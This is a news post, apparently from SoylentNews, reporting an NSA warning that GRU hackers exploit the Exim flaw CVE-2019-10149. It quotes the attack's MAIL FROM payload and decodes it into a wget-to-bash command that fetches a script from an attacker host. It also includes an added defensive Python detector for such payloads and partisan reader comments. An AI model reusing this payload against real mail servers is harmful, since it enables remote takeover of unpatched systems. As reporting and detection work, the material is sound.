
posted by Fnord666 on Saturday May 30 2020, @03:23PM
from the patch-your-servers-now! dept.

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be

That hexadecimal decodes to:

/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
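As an added example (not code from the article, The Register, the NSA advisory or the Exim project), here is a small Python checker that undoes the \xHH and \t escapes the quoted payload relies on and flags envelope senders that carry an Exim ${run{...}} expansion in MAIL FROM. Function names, the DANGEROUS_ITEMS list and the SMTP transcript are my own assumptions and constructed data.

```python
import re
from dataclasses import dataclass
# Exim's string expander resolves \xHH and \t \n \r \\ escapes, which is how the
# quoted payload hides "/bin/sh" and "wget" from naive pattern filters.
_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr\\])")
_CTRL = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}

def decode_exim_escapes(text: str) -> str:
    """Return text with \\xHH and \\t-style escapes resolved to literal characters."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return _CTRL[m.group(2)]
    return _ESCAPE_RE.sub(repl, text)

# ${run{...}} is the item in the quoted payload; the others are Exim items that likewise run code or read files/sockets.
DANGEROUS_ITEMS = frozenset({"run", "readsocket", "readfile", "perl", "dlfunc"})
_ITEM_RE = re.compile(r"\$\{([a-z_]+)\{")
_MAIL_FROM_RE = re.compile(r"MAIL FROM:\s*<?([^>\s]+)>?", re.IGNORECASE)

@dataclass
class Finding:
    sender: str       # raw envelope sender as seen on the wire
    decoded: str      # same address with escapes resolved
    items: list       # expansion item names found, e.g. ["run"]
    dangerous: bool   # True if any item can execute code or read files

def inspect_envelope_sender(sender: str) -> Finding:
    """Decode escapes first, then list every ${item{ expansion in the address."""
    decoded = decode_exim_escapes(sender)
    items = _ITEM_RE.findall(decoded)
    return Finding(sender, decoded, items, any(i in DANGEROUS_ITEMS for i in items))

def scan_smtp_transcript(lines) -> list:
    """Return a Finding for each MAIL FROM line whose sender carries an expansion."""
    hits = []
    for line in lines:
        m = _MAIL_FROM_RE.search(line)
        if m:
            f = inspect_envelope_sender(m.group(1))
            if f.items:
                hits.append(f)
    return hits

# Constructed SMTP transcript (not from the page); the ${run{...}} sender is inert (it would only echo a word) but uses the same escape obfuscation.
SAMPLE_TRANSCRIPT = [
    "MAIL FROM:<dollar$bill@example.org>",
    "MAIL FROM:${run{\\x2Fbin\\x2Fecho\\t\\x22hello\\x22}}@example.test",
]
```

A plain `$` in a local part (as in the first sample) is legal and produces no hit; the alert condition is a decoded `${item{` whose item is in DANGEROUS_ITEMS on a host still running an unpatched Exim.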



  • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @04:59PM (6 children)

    by Anonymous Coward on Saturday May 30 2020, @04:59PM (#1001067)

    Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @05:02PM (1 child)

    by Anonymous Coward on Saturday May 30 2020, @05:02PM (#1001068)

    You may joke, but that was my first, second, and third thought. Probably still leaning that way. I'm not kidding -- there's a Boy Who Cried Wolf issue here and Democrats, the legacy media, and their compadres in the Executive branch police and surveillance agencies are 100% at fault.

    • (Score: -1, Offtopic) by Anonymous Coward on Saturday May 30 2020, @05:50PM

      by Anonymous Coward on Saturday May 30 2020, @05:50PM (#1001090)

      Shit, they're rejecting the narrative. I know you're reading this, Bob. I told you so! We should have gone with clowncels instead.

  • (Score: 5, Touché) by ilPapa on Saturday May 30 2020, @05:52PM (3 children)

    by ilPapa (2366) on Saturday May 30 2020, @05:52PM (#1001091) Journal

    Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

    You dumb sonofabitch. Donald Trump is now in charge of the NSA.

    --
    You are still welcome on my lawn.
    • (Score: 0, Insightful) by Anonymous Coward on Saturday May 30 2020, @06:44PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @06:44PM (#1001106)

      >> You dumb sonofabitch. Donald Trump is now in charge of the NSA.

      You dumb sonofabitch. In Soviet America, the GRU is now in charge of Donald Trump.

      • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @08:35PM

        by Anonymous Coward on Saturday May 30 2020, @08:35PM (#1001150)

        Bastards. First the filthy, dirty, BO stink of the Incelabteilung murders Rosa Luxemburg, then grues eat Leon Trotsky, and now the Incelabteilung is in cahoots with the grues!

        Only Lysol and fluorescent lights can solve this!

    • (Score: 0) by Anonymous Coward on Wednesday June 03 2020, @01:41AM

      by Anonymous Coward on Wednesday June 03 2020, @01:41AM (#1002538)

      Okay, so, that makes them what? good? or evil?